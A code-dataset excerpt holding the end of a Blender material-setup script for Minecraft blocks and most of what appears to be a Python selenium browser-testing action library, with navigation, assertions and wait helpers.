applyMaterial(self, obj, metadata):\n try:\n mat = bpy.data.materials[self._unlocalizedName]\n except KeyError:\n mat = bpy.data.materials.new(self._unlocalizedName)\n mat.preview_render_type = \"CUBE\"\n mat.use_nodes = True\n mat.node_tree.nodes[\"Material Output\"].location = [300, 0]\n mat.node_tree.nodes[\"Diffuse BSDF\"].location = [100, 0]\n \n #Initialize Texture\n try:\n tex = bpy.data.images[self._unlocalizedName]\n except KeyError:\n tex = bpy.data.images.load(self.getBlockTexturePath(self._textureName))\n tex.name = self._unlocalizedName\n\n #First Image Texture\n mat.node_tree.nodes.new(type=\"ShaderNodeTexImage\")\n mat.node_tree.nodes[\"Image Texture\"].location = [-100, 75]\n mat.node_tree.nodes[\"Image Texture\"].image = tex\n mat.node_tree.nodes[\"Image Texture\"].interpolation = \"Closest\"\n mat.node_tree.nodes[\"Image Texture\"].projection = \"FLAT\"\n mat.node_tree.links.new(mat.node_tree.nodes[\"Image Texture\"].outputs[0], mat.node_tree.nodes[\"Diffuse BSDF\"].inputs[0])\n \n #UV Map\n mat.node_tree.nodes.new(type=\"ShaderNodeUVMap\")\n mat.node_tree.nodes[\"UV Map\"].location = [-300, 0]\n mat.node_tree.nodes[\"UV Map\"].uv_map = \"UVMap\"\n mat.node_tree.links.new(mat.node_tree.nodes[\"UV Map\"].outputs[0], mat.node_tree.nodes[\"Image Texture\"].inputs[0])\n \n obj.data.materials.append(mat)\n","repo_name":"scribblemaniac/MCEdit2Blender","sub_path":"blocks/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"}
+{"seq_id":"72013873031","text":"import codecs\nimport logging\nimport os\nimport re\nimport time\n\nfrom datetime import datetime\nfrom pdb import set_trace as debug\nfrom urlparse import urljoin, urlparse\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import keys\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.common.exceptions import (\n InvalidElementStateException,\n NoSuchAttributeException,\n NoSuchElementException,\n NoSuchFrameException,\n NoSuchWindowException,\n StaleElementReferenceException,\n WebDriverException,\n)\n\nfrom sst import config\nfrom sst import bmobproxy\n\n\n__all__ = [\n 'accept_alert', 'add_cleanup', 'assert_attribute', 'assert_button',\n 'assert_checkbox', 'assert_checkbox_value', 'assert_css_property',\n 'assert_displayed', 'assert_dropdown', 'assert_dropdown_value',\n 'assert_element', 'assert_equal', 'assert_link', 'assert_not_equal',\n 'assert_radio', 'assert_radio_value', 'assert_table_has_rows',\n 'assert_table_headers', 'assert_table_row_contains_text',\n 'assert_text', 'assert_text_contains', 'assert_textfield',\n 'assert_title', 'assert_title_contains', 'assert_url',\n 'assert_url_contains', 'check_flags', 'clear_cookies',\n 'click_button', 'click_element', 'click_link', 'close_window',\n 'debug', 'dismiss_alert', 'end_test', 'execute_script',\n 'exists_element', 'fails', 'get_argument', 'get_base_url',\n 'get_cookies', 'get_current_url', 'get_element',\n 'get_element_by_css', 'get_element_by_xpath', 'get_element_source',\n 'get_elements', 'get_elements_by_css', 'get_elements_by_xpath',\n 'get_link_url', 'get_page_source', 'get_wait_timeout', 'get_window_size',\n 'go_back', 'go_to', 'refresh', 'reset_base_url', 'retry_on_stale_element',\n 'run_test', 'save_page_source', 'set_base_url', 'set_checkbox_value',\n 'set_dropdown_value', 'set_radio_value', 'set_wait_timeout',\n 'set_window_size', 'simulate_keys', 'skip', 'sleep', 'start',\n 'stop', 'switch_to_frame', 'switch_to_window',\n 'take_screenshot', 'toggle_checkbox', 'wait_for',\n 'wait_for_and_refresh', 'write_textfield'\n]\n\n\nbrowser = None\nbrowsermob_proxy = None\n_check_flags = True\n_test = None\n\nBASE_URL = 'http://localhost:8000/'\n__DEFAULT_BASE_URL__ = BASE_URL\n\nlogger = logging.getLogger('SST')\n\n\nclass EndTest(StandardError):\n pass\n\n\ndebug.__doc__ = \"\"\"Start the debugger, a shortcut for `pdb.set_trace()`.\"\"\"\n\n\nclass _Sentinel(object):\n def __repr__(self):\n return 'default'\n_sentinel = _Sentinel()\n\n\ndef _raise(msg):\n logger.debug(msg)\n raise AssertionError(msg)\n\n\ndef retry_on_stale_element(func):\n \"\"\"Decorate ``func`` so StaleElementReferenceException triggers a retry.\n\n ``func`` is retried only once.\n\n selenium sometimes raises StaleElementReferenceException which leads to\n spurious failures. In those cases, using this decorator will retry the\n function once and avoid the spurious failure. 
This is a work-around until\n selenium is properly fixed and should not be abused (or there is a\n significant risk to hide bugs in the user scripts).\n \"\"\"\n def wrapped(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except StaleElementReferenceException as e:\n logger.warning('Retrying after catching: %r' % e)\n return func(*args, **kwargs)\n return wrapped\n\n\ndef set_base_url(url):\n \"\"\"Set the url used for relative arguments to the `go_to` action.\"\"\"\n global BASE_URL\n if not url.startswith('http') and not url.startswith('file'):\n url = 'http://' + url\n logger.debug('Setting base url to: %r' % url)\n BASE_URL = url\n\n\ndef get_base_url():\n \"\"\"Return the base url used by `go_to`.\"\"\"\n return BASE_URL\n\n\ndef reset_base_url():\n \"\"\"\n Restore the base url to the default. This is called automatically for\n you when a test script completes.\"\"\"\n global BASE_URL\n BASE_URL = __DEFAULT_BASE_URL__\n\n\ndef end_test():\n \"\"\"\n If called it ends the test. Can be used conditionally to exit a\n test under certain conditions.\"\"\"\n raise EndTest\n\n\ndef skip(reason=''):\n \"\"\"\n Skip the test. Unlike `end_test` a skipped test will be reported\n as a skip rather than a pass.\"\"\"\n _test.skipTest(reason)\n\n\ndef start(browser_type=None, device='', version='',\n browser_platform='ANY', session_name='',\n javascript_disabled=False, assume_trusted_cert_issuer=False,\n webdriver_remote=None, additional_capabilities=None,\n webdriver_class=None, saucelabs_enabled=False, skip_tracking=False):\n \"\"\"\n Starts Browser with a new session. Called for you at\n the start of each test script.\"\"\"\n global browser\n global browsermob_proxy\n\n if browser_type is None:\n browser_type = config.browser_type\n\n if logger.isEnabledFor(logging.DEBUG):\n # XXX We print a new line because otherwise the first debug message\n # will be printed on the same line as the name of the test. 
This is\n # hacky and doesn't cover cases when the script logs things higher\n # than debug, but this way we are keeping the same behavior we had\n # before adding the log.\n print\n logger.debug('Starting browser: %s' % browser_type)\n\n if webdriver_remote is None:\n if browser_type == 'Firefox':\n # profile features are FF only\n profile = getattr(webdriver, '%sProfile' % browser_type)()\n profile.set_preference('intl.accept_languages', 'en')\n if config.browsermob_enabled:\n # proxy integration is currently FF only\n browsermob_proxy = bmobproxy.BrowserMobProxy(\n 'localhost', 8080)\n selenium_proxy = webdriver.Proxy(\n {'httpProxy': browsermob_proxy.url})\n profile.set_proxy(selenium_proxy)\n if assume_trusted_cert_issuer:\n profile.set_preference(\n 'webdriver_assume_untrusted_issuer', False)\n profile.set_preference(\n 'capability.policy.default.Window.QueryInterface',\n 'allAccess')\n profile.set_preference(\n 'capability.policy.default.Window.frameElement.get',\n 'allAccess')\n if javascript_disabled:\n profile.set_preference('javascript.enabled', False)\n browser = getattr(webdriver, browser_type)(profile)\n else:\n browser = getattr(webdriver, browser_type)()\n else:\n desired_capabilities = {\"browserName\": browser_type.lower(),\n \"platform\": browser_platform.upper(),\n \"version\": version,\n \"device\": device,\n \"javascriptEnabled\": not javascript_disabled,\n \"name\": session_name,\n \"build\": config.cmd_opts.env}\n if additional_capabilities:\n desired_capabilities.update(additional_capabilities)\n\n browser_class = webdriver_class if webdriver_class else webdriver.Remote\n browser = browser_class(desired_capabilities=desired_capabilities,\n command_executor=webdriver_remote)\n\n # FIXME: Not a good way to share the browser object.\n config.cache['browser'] = browser\n config.cache['browsermob_proxy'] = browsermob_proxy\n\n return browser, browsermob_proxy\n\n\ndef stop():\n \"\"\"\n Stops Firefox and ends the browser session. Called automatically for you at\n the end of each test script.\"\"\"\n global browser\n global browsermob_proxy\n\n logger.debug('Stopping browser')\n # quit calls close() and does cleanup\n browser.quit()\n browser = None\n\n if browsermob_proxy is not None:\n logger.debug('Closing http proxy')\n browsermob_proxy.close()\n browsermob_proxy = None\n\n\ndef refresh(wait=True):\n \"\"\"\n Refresh the current page.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Refreshing current page')\n browser.refresh()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n\ndef take_screenshot(filename='screenshot.png', add_timestamp=True):\n \"\"\"\n Take a screenshot of the browser window. 
Called automatically on failures\n when running in `-s` mode.\n\n Return the path to the saved screenshot.\"\"\"\n logger.debug('Capturing Screenshot')\n _make_results_dir()\n if add_timestamp:\n filename = _add_time_stamp(filename)\n screenshot_file = os.path.join(config.results_directory, filename)\n browser.get_screenshot_as_file(screenshot_file)\n return screenshot_file\n\n\ndef _add_time_stamp(filename):\n now = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n root, extension = os.path.splitext(filename)\n return '{0}-{1}{2}'.format(root, now, extension)\n\n\ndef save_page_source(filename='pagedump.html', add_timestamp=True):\n \"\"\"\n Save the source of the currently opened page.\n Called automatically on failures when running `-s` mode.\n\n Return the path to the saved file.\"\"\"\n logger.debug('Saving page source')\n _make_results_dir()\n if add_timestamp:\n filename = _add_time_stamp(filename)\n page_source_file = os.path.join(config.results_directory, filename)\n with codecs.open(page_source_file, 'w', encoding='utf-8') as f:\n f.write(get_page_source())\n return page_source_file\n\n\ndef _make_results_dir():\n \"\"\"\n Make results directory if it does not exist.\"\"\"\n try:\n os.makedirs(config.results_directory)\n except OSError:\n pass # already exists\n\n\ndef sleep(secs):\n \"\"\"\n Delay execution for a given number of seconds. The argument may be a\n floating point number for subsecond precision.\"\"\"\n logger.debug('Sleeping %s secs' % secs)\n time.sleep(secs)\n\n\ndef _fix_url(url):\n parsed = urlparse(url)\n if not parsed.scheme:\n url = urljoin(BASE_URL, url)\n return url\n\n\ndef _add_trailing_slash(url):\n if not url.endswith('/'):\n url += '/'\n return url\n\n\ndef get_argument(name, default=_sentinel):\n \"\"\"\n Get an argument from the one the test was called with.\n\n A test is called with arguments when it is executed by\n the `run_test`. You can optionally provide a default value\n that will be used if the argument is not set. If you don't\n provide a default value and the argument is missing an\n exception will be raised.\"\"\"\n args = config.__args__\n\n value = args.get(name, default)\n if value is _sentinel:\n raise LookupError(name)\n return value\n\n\ndef run_test(name, **kwargs):\n \"\"\"\n Execute a named test, with the specified arguments.\n\n Arguments can be retrieved by the test with `get_argument`.\n\n The `name` is the test file name without the '.py'.\n\n You can specify tests in an alternative directory with\n relative path syntax. e.g.::\n\n run_test('subdir/foo', spam='eggs')\n\n Tests can return a result by setting the name `RESULT`\n in the test.\n\n Tests are executed with the same browser (and browser\n session) as the test calling `test_run`. 
This includes\n whether or not Javascript is enabled.\n\n Before the test is called the timeout and base url are\n reset, but will be restored to their orginal value\n when `run_test` returns.\"\"\"\n # delayed import to workaround circular imports\n from sst import context\n logger.debug('Executing test: %s' % name)\n return context.run_test(name, kwargs)\n\n\ndef _make_useable_har_name(stem=''):\n now = datetime.now()\n timestamped_base = 'har-%s' % now.strftime('%Y-%m-%d_%H-%M-%S-%f')\n if stem:\n slug_name = ''.join(x for x in stem if x.isalnum())\n out_name = '%s-%s.har' % (timestamped_base, slug_name)\n else:\n out_name = '%s.har' % timestamped_base\n file_name = os.path.join(config.results_directory, out_name)\n return file_name\n\n\ndef go_to(url='', wait=True):\n \"\"\"\n Go to a specific URL. If the url provided is a relative url it will be\n added to the base url. You can change the base url for the test with\n `set_base_url`.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n if browser is None:\n start()\n\n url = _fix_url(url)\n\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Going to... %s' % url)\n browser.get(url)\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name(url))\n\n\ndef go_back(wait=True):\n \"\"\"\n Go one step backward in the browser history.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Going back one step in browser history')\n browser.back()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n\ndef assert_checkbox(id_or_elem):\n \"\"\"\n Assert that the element is a checkbox.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n a checkbox.\"\"\"\n elem = _get_elem(id_or_elem)\n _elem_is_type(elem, id_or_elem, 'checkbox')\n return elem\n\n\ndef assert_checkbox_value(id_or_elem, value):\n \"\"\"\n Assert checkbox value. Takes an element id or object plus either True or\n False. Raises a failure exception if the element specified doesn't exist\n or isn't a checkbox.\"\"\"\n checkbox = assert_checkbox(id_or_elem)\n real = checkbox.is_selected()\n msg = 'Checkbox: %r - Has Value: %r' % (_get_text(checkbox), real)\n if real != value:\n _raise(msg)\n\n\ndef toggle_checkbox(id_or_elem):\n \"\"\"\n Toggle the checkbox value. Takes an element id or object. Raises a failure\n exception if the element specified doesn't exist or isn't a checkbox.\"\"\"\n checkbox = assert_checkbox(id_or_elem)\n logger.debug('Toggling checkbox: %r' % _get_text(checkbox))\n before = checkbox.is_selected()\n checkbox.click()\n after = checkbox.is_selected()\n msg = 'Checkbox: %r - was not toggled, value remains: %r' \\\n % (_get_text(checkbox), before)\n if before == after:\n _raise(msg)\n\n\ndef set_checkbox_value(id_or_elem, new_value):\n \"\"\"\n Set a checkbox to a specific value, either True or False. 
Raises a failure\n exception if the element specified doesn't exist or isn't a checkbox.\"\"\"\n checkbox = assert_checkbox(id_or_elem)\n logger.debug(\n 'Setting checkbox %r to %r' % (_get_text(checkbox), new_value))\n # There is no method to 'unset' a checkbox in the browser object\n current_value = checkbox.is_selected()\n if new_value != current_value:\n toggle_checkbox(id_or_elem)\n\n\ndef _make_keycode(key_to_make):\n \"\"\"\n Take a key and return a keycode\"\"\"\n k = keys.Keys()\n keycode = k.__getattribute__(key_to_make.upper())\n return keycode\n\n\ndef simulate_keys(id_or_elem, key_to_press):\n \"\"\"\n Simulate key sent to specified element.\n (available keys located in `selenium/webdriver/common/keys.py`)\n\n e.g.::\n\n simulate_keys('text_1', 'BACK_SPACE')\n\n \"\"\"\n key_element = _get_elem(id_or_elem)\n msg = 'Simulating keypress on %r with %r key' \\\n % (_get_text(key_element), key_to_press)\n logger.debug(msg)\n key_code = _make_keycode(key_to_press)\n key_element.send_keys(key_code)\n\n\n_textfields = (\n 'text', 'password', 'textarea', 'email',\n 'url', 'search', 'number', 'file')\n\n\ndef assert_textfield(id_or_elem):\n \"\"\"\n Assert that the element is a textfield, textarea or password box.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist\n or isn't a textfield.\"\"\"\n elem = _get_elem(id_or_elem)\n _elem_is_type(elem, id_or_elem, *_textfields) # see _textfields tuple\n return elem\n\n\ndef write_textfield(id_or_elem, new_text, check=True, clear=True):\n \"\"\"\n Set the specified text into the textfield. If the text fails to write (the\n textfield contents after writing are different to the specified text) this\n function will fail. You can switch off the checking by passing\n `check=False`. The field is cleared before written to. You can switch this\n off by passing `clear=False`.\"\"\"\n textfield = assert_textfield(id_or_elem)\n msg = 'Writing to textfield %r with text %r' \\\n % (_get_text(textfield), new_text)\n logger.debug(msg)\n\n # clear field like this, don't use clear()\n if clear:\n textfield.send_keys(keys.Keys().CONTROL, 'a')\n textfield.send_keys(keys.Keys().DELETE)\n\n if isinstance(new_text, unicode):\n textfield.send_keys(new_text)\n else:\n textfield.send_keys(str(new_text))\n if not check:\n return\n logger.debug('Check text wrote correctly')\n current_text = textfield.get_attribute('value')\n if current_text != new_text:\n msg = 'Textfield: %r - did not write. Text was: %r' \\\n % (_get_text(textfield), current_text)\n _raise(msg)\n\n\ndef assert_link(id_or_elem):\n \"\"\"\n Assert that the element is a link.\n\n Raises a failure exception if the element specified doesn't exist or\n isn't a link\"\"\"\n link = _get_elem(id_or_elem)\n if link.tag_name != 'a':\n msg = 'The text %r is not part of a Link or a Link ID' \\\n % _get_text(link)\n _raise(msg)\n return link\n\n\ndef get_link_url(id_or_elem):\n \"\"\"Return the URL from a link.\"\"\"\n logger.debug('Getting url from link %r' % id_or_elem)\n link = assert_link(id_or_elem)\n link_url = link.get_attribute('href')\n return link_url\n\n\ndef get_current_url():\n \"\"\"Gets the URL of the current page.\"\"\"\n return browser.current_url\n\n\ndef click_link(id_or_elem, check=False, wait=True):\n \"\"\"\n Click the specified link. As some links do redirects the location you end\n up at is not checked by default. 
If you pass in `check=True` then this\n action asserts that the resulting url is the link url.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n link = assert_link(id_or_elem)\n link_url = link.get_attribute('href')\n\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Clicking link %r' % _get_text(link))\n link.click()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n # some links do redirects - so we\n # don't check by default\n if check:\n assert_url(link_url)\n\n\ndef assert_displayed(id_or_elem):\n \"\"\"\n Assert that the element is displayed.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n displayed. Returns the element if it is displayed.\"\"\"\n element = _get_elem(id_or_elem)\n if not element.is_displayed():\n message = 'Element is not displayed'\n _raise(message)\n return element\n\ndef assert_not_displayed(id_or_elem):\n \"\"\"\n Assert that the element is not displayed.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or is\n displayed. Returns the element if it is not displayed.\"\"\"\n element = _get_elem(id_or_elem)\n if element.is_displayed():\n message = 'Element is displayed'\n _raise(message)\n return element\n\ndef click_element(id_or_elem, wait=True):\n \"\"\"\n Click on an element of any kind not specific to links or buttons.\n\n By default this action will wait until a page with a body element is\n available after the click. You can switch off this behaviour by passing\n `wait=False`.\"\"\"\n elem = _get_elem(id_or_elem)\n\n if browsermob_proxy is not None:\n logger.debug('Capturing http traffic...')\n browsermob_proxy.new_har()\n\n logger.debug('Clicking element %r' % _get_text(elem))\n elem.click()\n\n if wait:\n _waitforbody()\n\n if browsermob_proxy is not None:\n logger.debug('Saving HAR output')\n _make_results_dir()\n browsermob_proxy.save_har(_make_useable_har_name())\n\n\ndef assert_title(title):\n \"\"\"Assert the page title is as specified.\"\"\"\n real_title = browser.title\n msg = 'Title is: %r. Should be: %r' % (real_title, title)\n if real_title != title:\n _raise(msg)\n\n\ndef assert_title_contains(text, regex=False):\n \"\"\"\n Assert the page title contains the specified text.\n\n set `regex=True` to use a regex pattern.\"\"\"\n real_title = browser.title\n msg = 'Title is: %r. Does not contain %r' % (real_title, text)\n if regex:\n if not re.search(text, real_title):\n _raise(msg)\n else:\n if text not in real_title:\n _raise(msg)\n\n\ndef assert_url(url):\n \"\"\"\n Assert the current url is as specified. Can be an absolute url or\n relative to the base url.\"\"\"\n url = _fix_url(url)\n url = _add_trailing_slash(url)\n real_url = browser.current_url\n real_url = _add_trailing_slash(real_url)\n msg = 'Url is: %r. Should be: %r' % (real_url, url)\n if url != real_url:\n _raise(msg)\n\n\ndef assert_url_contains(text, regex=False):\n \"\"\"\n Assert the current url contains the specified text.\n\n set `regex=True` to use a regex pattern.\"\"\"\n real_url = browser.current_url\n msg = 'Url is %r. 
Does not contain %r' % (real_url, text)\n if regex:\n if not re.search(text, real_url):\n _raise(msg)\n else:\n if text not in real_url:\n _raise(msg)\n\n\n_TIMEOUT = 20\n_POLL = 0.1\n\n\ndef set_wait_timeout(timeout, poll=None):\n \"\"\"\n Set the timeout, in seconds, used by `wait_for`. The default at the start\n of a test is always 10 seconds.\n\n The optional second argument, is how long (in seconds) `wait_for` should\n wait in between checking its condition (the poll frequency). The default\n at the start of a test is always 0.1 seconds.\"\"\"\n msg = 'Setting wait timeout to %rs' % timeout\n if poll is not None:\n msg += ('. Setting poll time to %rs' % poll)\n logger.debug(msg)\n _set_wait_timeout(timeout, poll)\n\n\ndef _set_wait_timeout(timeout, poll=None):\n global _TIMEOUT\n global _POLL\n _TIMEOUT = timeout\n if poll is not None:\n _POLL = poll\n\n\ndef get_wait_timeout():\n \"\"\"Get the timeout, in seconds, used by `wait_for`.\"\"\"\n return _TIMEOUT\n\n\ndef _get_name(obj):\n try:\n return obj.__name__\n except:\n return repr(obj)\n\n\ndef _wait_for(condition, refresh_page, timeout, poll, *args, **kwargs):\n msg = '%s(%r)' % (_get_name(condition),\n args[0] if args else kwargs if kwargs else '')\n logger.debug('Waiting for %s' % msg)\n # Disable logging levels equal to or lower than INFO.\n logging.disable(logging.INFO)\n try:\n max_time = time.time() + timeout\n while True:\n #refresh the page if requested\n if refresh_page:\n refresh()\n e = None\n try:\n result = condition(*args, **kwargs)\n except AssertionError as e:\n pass\n else:\n if result is not False:\n break\n if time.time() > max_time:\n error = 'Timed out waiting for: %s' % msg\n if e:\n error += '\\nError during wait: %s' % e\n _raise(error)\n time.sleep(poll)\n finally:\n # Re-enable logging.\n logging.disable(logging.NOTSET)\n\n\n@retry_on_stale_element\ndef wait_for(condition, *args, **kwargs):\n \"\"\"\n Wait for an action to pass. Useful for checking the results of actions\n that may take some time to complete.\n\n This action takes a condition function and any arguments it should be\n called with. The condition function can either be an action or a function\n that returns True for success and False for failure. For example::\n\n wait_for(assert_title, 'Some page title')\n\n If the specified condition does not become true within 10 seconds then\n `wait_for` fails.\n\n You can set the timeout for `wait_for` by calling `set_wait_timeout`.\"\"\"\n _wait_for(condition, False, _TIMEOUT, _POLL, *args, **kwargs)\n\n\ndef wait_for_and_refresh(condition, *args, **kwargs):\n \"\"\"\n Wait for an action to pass. Useful for checking the results of actions\n that may take some time to complete. The difference to wait_for() is, that\n wait_for_and_refresh() refresh the current page with refresh() after every\n condition check.\n\n This action takes a condition function and any arguments it should be\n called with. The condition function can either be an action or a function\n that returns True for success and False for failure. 
For example::\n\n wait_for_and_refresh(assert_title, 'Some page title')\n\n If the specified condition does not become true within 10 seconds then\n `wait_for_and_refresh` fails.\n\n You can set the timeout for `wait_for_and_refresh` by calling\n `set_wait_timeout`.\n \"\"\"\n _wait_for(condition, True, _TIMEOUT, _POLL, *args, **kwargs)\n\n\ndef fails(action, *args, **kwargs):\n \"\"\"\n This action is particularly useful for *testing* other actions, by\n checking that they fail when they should do. `fails` takes a function\n (usually an action) and any arguments and keyword arguments to call the\n function with. If calling the function raises an AssertionError then\n `fails` succeeds. If the function does *not* raise an AssertionError then\n this action raises the appropriate failure exception. Alll other\n exceptions will be propagated normally.\"\"\"\n logger.debug('Trying action failure: %s' % _get_name(action))\n try:\n action(*args, **kwargs)\n except AssertionError:\n return\n msg = 'Action %r did not fail' % _get_name(action)\n _raise(msg)\n\n\ndef _get_elem(id_or_elem):\n if isinstance(id_or_elem, WebElement):\n return id_or_elem\n try:\n return browser.find_element_by_id(id_or_elem)\n except (NoSuchElementException, WebDriverException):\n msg = 'Element with id: %r does not exist' % id_or_elem\n _raise(msg)\n\n\n# Takes an optional 2nd input type for cases like textfield & password\n# where types are similar\ndef _elem_is_type(elem, name, elem_types):\n try:\n result = elem.get_attribute('type')\n except NoSuchAttributeException:\n msg = 'Element has no type attribute'\n _raise(msg)\n if not result in elem_types:\n msg = 'Element %r is not one of %r' % (name, elem_types)\n _raise(msg)\n\n\ndef assert_dropdown(id_or_elem):\n \"\"\"Assert the specified element is a select drop-list.\"\"\"\n elem = _get_elem(id_or_elem)\n #FIXME: we should have a dedicated function to be able to do a multiple select\n _elem_is_type(elem, id_or_elem, ('select-one', 'select-multiple'))\n return elem\n\n\ndef set_dropdown_value(id_or_elem, text=None, value=None):\n \"\"\"Set the select drop-list to a text or value specified.\"\"\"\n elem = assert_dropdown(id_or_elem)\n logger.debug(\n 'Setting %r option list to %r' % (_get_text(elem), text or value))\n if text and not value:\n for element in elem.find_elements_by_tag_name('option'):\n if element.text == text:\n element.click()\n return\n msg = 'The following option could not be found in the list: %r' % text\n elif value and not text:\n for element in elem.find_elements_by_tag_name('option'):\n if element.get_attribute(\"value\") == value:\n element.click()\n return\n msg = 'The following option could not be found in the list: %r' % value\n else:\n msg = 'Use set_dropdown_value() with either text or value!'\n _raise(msg)\n\n\ndef assert_dropdown_value(id_or_elem, text_in):\n \"\"\"Assert the specified select drop-list is set to the specified value.\"\"\"\n elem = assert_dropdown(id_or_elem)\n # Because there is no way to connect the current\n # text of a select element we have to use 'value'\n current = elem.get_attribute('value')\n for element in elem.find_elements_by_tag_name('option'):\n if text_in == element.text and \\\n current == element.get_attribute('value'):\n return\n msg = 'The option is not currently set to: %r' % text_in\n _raise(msg)\n\n\ndef assert_radio(id_or_elem):\n \"\"\"\n Assert the specified element is a radio button.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or 
isn't\n a radio button\"\"\"\n elem = _get_elem(id_or_elem)\n _elem_is_type(elem, id_or_elem, 'radio')\n return elem\n\n\ndef assert_radio_value(id_or_elem, value):\n \"\"\"\n Assert the specified element is a radio button with the specified value;\n True for selected and False for unselected.\n\n Takes an id or an element object.\n Raises a failure exception if the element specified doesn't exist or isn't\n a radio button\"\"\"\n elem = assert_radio(id_or_elem)\n selected = elem.is_selected()\n msg = 'Radio %r should be set to: %s.' % (_get_text(elem), value)\n if value != selected:\n _raise(msg)\n\n\ndef set_radio_value(id_or_elem):\n \"\"\"Select the specified radio button.\"\"\"\n elem = assert_radio(id_or_elem)\n logger.debug('Selecting radio button item %r' % _get_text(elem))\n elem.click()\n\n\ndef _get_text(elem):\n text = None\n try:\n text = elem.text\n except InvalidElementStateException:\n pass\n if text:\n # Note that some elements (like textfields) return empty string\n # for text and we still need to call value\n return text\n try:\n text = elem.get_attribute('value')\n except InvalidElementStateException:\n pass\n return text\n\n\ndef assert_text(id_or_elem, text):\n \"\"\"\n Assert the specified element text is as specified.\n\n Raises a failure exception if the element specified doesn't exist or isn't\n as specified\"\"\"\n elem = _get_elem(id_or_elem)\n real = _get_text(elem)\n if real is None:\n msg = 'Element %r has no text attribute' % _get_text(elem)\n _raise(msg)\n if real != text:\n msg = 'Element text should be %r. It is %r.' % (text, real)\n _raise(msg)\n\n\ndef assert_text_contains(id_or_elem, text, regex=False):\n \"\"\"\n Assert the specified element contains the specified text.\n\n set `regex=True` to use a regex pattern.\"\"\"\n elem = _get_elem(id_or_elem)\n real = _get_text(elem)\n if real is None:\n msg = 'Element %r has no text attribute' % _get_text(elem)\n _raise(msg)\n msg = 'Element text is %r. Does not contain %r' % (real, text)\n if regex:\n if not re.search(text, real):\n _raise(msg)\n else:\n if text not in real:\n _raise(msg)\n\n\ndef _check_text(elem, text):\n return _get_text(elem) == text\n\n\ndef _match_text(elem, regex):\n text = _get_text(elem) or ''\n return bool(re.search(regex, text))\n\n\ndef get_elements(tag=None, css_class=None, id=None, text=None,\n text_regex=None, **kwargs):\n \"\"\"\n This function will find and return all matching elements by any of several\n attributes. If the elements cannot be found from the attributes you\n provide, the call will fail with an exception.\n\n You can specify as many or as few attributes as you like.\n\n `text_regex` finds elements by doing a regular expression search against\n the text of elements. 
It cannot be used in conjunction with the `text`\n argument and cannot be the *only* argument to find elements.\"\"\"\n if text and text_regex:\n raise TypeError(\"You can't use text and text_regex arguments\")\n\n selector_string = ''\n if tag:\n selector_string = tag\n if css_class:\n css_class_selector = css_class.strip().replace(' ', '.')\n selector_string += ('.%s' % css_class_selector)\n if id:\n selector_string += ('#%s' % id)\n\n selector_string += ''.join(['[%s=%r]' % (key, value) for\n key, value in kwargs.items()])\n try:\n if text and not selector_string:\n elems = browser.find_elements_by_xpath('//*[text() = %r]' % text)\n else:\n if not selector_string:\n msg = 'Could not identify element: no arguments provided'\n _raise(msg)\n logger.debug('Finding element: %s' % selector_string)\n elems = browser.find_elements_by_css_selector(selector_string)\n except (WebDriverException, NoSuchElementException) as e:\n msg = 'Element not found: %s' % e\n _raise(msg)\n\n if text:\n # if text was specified, filter elements\n elems = [element for element in elems if _check_text(element, text)]\n elif text_regex:\n elems = [elem for elem in elems if _match_text(elem, text_regex)]\n\n if not elems:\n msg = 'Could not identify elements: 0 elements found'\n _raise(msg)\n\n return elems\n\n\ndef get_element(tag=None, css_class=None, id=None, text=None,\n text_regex=None, **kwargs):\n \"\"\"\n This function will find and return an element by any of several\n attributes. If the element cannot be found from the attributes you\n provide, or the attributes match more than one element, the call will fail\n with an exception.\n\n Finding elements is useful for checking that the element exists, and also\n for passing to other actions that work with element objects.\n\n You can specify as many or as few attributes as you like, so long as they\n uniquely identify one element.\n\n `text_regex` finds elements by doing a regular expression search against\n the text of elements. It cannot be used in conjunction with the `text`\n argument and cannot be the *only* argument to find elements.\"\"\"\n elems = get_elements(tag=tag, css_class=css_class,\n id=id, text=text, text_regex=text_regex, **kwargs)\n\n if len(elems) != 1:\n msg = 'Could not identify element: %s elements found' % len(elems)\n _raise(msg)\n\n return elems[0]\n\n\ndef exists_element(tag=None, css_class=None, id=None, text=None,\n text_regex=None, **kwargs):\n \"\"\"\n This function will find if an element exists by any of several\n attributes. 
